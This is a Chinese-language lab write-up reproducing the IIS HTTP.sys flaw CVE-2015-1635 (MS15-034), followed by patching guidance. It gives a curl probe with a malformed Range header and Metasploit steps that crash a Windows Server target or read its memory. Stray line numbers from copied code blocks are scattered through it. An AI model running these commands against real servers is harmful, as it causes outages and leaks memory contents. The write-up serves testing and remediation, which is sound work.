CVE-2015-1635

CVE-2015-1635-Microsoft Windows HTTP.SYS远程执行代码漏洞（ms15-034）

漏洞说明：
Microsoft Windows是美国微软（Microsoft）公司发布的一系列操作系统。Microsoft Internet Information Services（IIS）是一套运行于Microsoft Windows中的互联网基本服务。
使用Microsoft IIS 6.0以上版本的Microsoft Windows的HTTP协议堆栈(HTTP.sys)中存在远程执行代码漏洞，该漏洞源于HTTP.sys文件没有正确分析经特殊设计的HTTP请求。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
漏洞受影响的版本：

安装了微软IIS7.0及以上版本的
1

Microsoft Windows 7 SP1
Windows Server 2008 R2 SP1
Windows 8
Windows 8.1
Windows Server 2012
Windows Server 2012 R2

复现

复现环境 靶机 Windows 7
Windows server 2008 R2
攻击机 Kali

信息搜集

curl -v IP -H "Host:irrelevant" -H "Range:bytes=0-18446744073709551615"
# 验证是否存在漏洞 回显 416 证明存在漏洞
1
2

打开kali 命令行输入 msfconsole
1

search ms15-034
#搜索 ms15-034 漏洞
1
2

对Windows server 2008 R2 靶机进行攻击

use 0
# 使用第一个payload进行DOS测试攻击
set rhost IP
# 设置靶机IP地址
run
# 展开攻击
1
2
3
4
5
6
7
8

攻击成功后靶机蓝屏，自动重启

对Windows server 2008 R2 靶机进行攻击

use 1
# 使用第一个payload进行测试查看内存攻击
set rhost IP
# 设置靶机IP地址
run
# 展开攻击
1
2
3
4
5
6
7
8

攻击成功后读取靶机内存信息

漏洞修复

禁用 IIS 内核缓存（可能降低 IIS 性能）

取消勾选启用内核缓存

对相关应用程序进行打补丁的操作

https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034
# 补丁链接
1
2

找到相对应的版本链接进行访问请求，获取补丁。

1.MS15-034漏洞的补丁是KB3042553;
2.如果在一台Windows Server 2012 R2的服务器上直接安装补丁文件KB3042553，可能会出现“此更新
不适用于您的计算机”的问题，这是因为此补丁依赖于补丁：KB3021910、KB2919355。只需要按顺序
安装以下补丁即可：KB3021910、KB2919355、KB3042553;
3.安装补丁之后对机器的性能、.net框架等均没有影响，但是需要重启机器

下载地址：
https://www.microsoft.com/en-us/download/details.aspx?id=46808
https://www.microsoft.com/zh-cn/download/details.aspx?id=42327
https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034
1
2
3
4
5
6
7
8
9
10

逐个下载 逐个安装 即可解决问题